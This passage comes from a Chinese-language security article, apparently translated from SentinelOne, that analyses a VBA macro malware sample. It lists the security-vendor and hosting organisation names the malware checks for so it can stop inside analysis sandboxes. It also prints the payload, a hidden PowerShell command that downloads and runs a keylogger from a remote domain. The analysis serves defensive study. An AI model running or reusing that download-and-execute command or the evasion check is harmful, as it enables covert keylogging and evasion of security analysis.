在以上示例文件中，IP信息的organization字段显示为美国Comcast宽带网络供应商。恶意软件发出访问请求后，获取到宿主系统的相关信息将存储于某个数组中。如果获取到的组织机构名称与以下JSON文件中的任何机构字符串匹配，恶意软件将发生异常并停止运行。

Amazon anonymous BitDefender BlackOakComputers Blue Coat BlueCoat Cisco cloud Data Center DataCenter DataCentre dedicated ESET, Spol FireEye ForcePoint Fortinet Hetzner hispeed.ch hosted Hosting Iron Port IronPort LeaseWeb MessageLabs Microsoft MimeCast NForce Ovh Sas Palo Alto ProofPoint Rackspace security Server Strong Technologies Trend Micro TrendMicro TrustWave VMVault Zscaler

当然，上述列表中的机构名称在代码中是经过混淆的：

以上信息表明，恶意程序通过检查，是否有网络服务商或杀毒软件公司相关的IP地址运行VM虚拟机对其进行调试分析，如果有，将停止运行。

PAYLOAD

如果恶意程序发现宿主系统有3个或以上的Word最近打开文档，将会执行远程下载解盘记录程序的PowerShell脚本：

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

中涉及的worddata.dat是一个轻量级的键盘记录程序，SHA256为19d884d3b688abf8e284d3bc6a06817096d15592bcd73f85a0e4b79749f2a744。

其它

Researchers at Proofpoint 和Deepen Desai at zscaler两篇文章都对 anti-vm和anti-sandbox做了深入讨论，这些技术涉及到了不同种类的恶意软件，它们或许代表了VBA恶意软件的一种发展趋势。

当然，看雪论坛的一篇经典文章《虚拟机检测技术剖析》，也是非常值得学习的。

样本代码和文件分析：VirusTotal

*参考来源：Sentinelone, *FB小编clouds编译，转载请注明来自FreeBuf（FreeBuf.COM）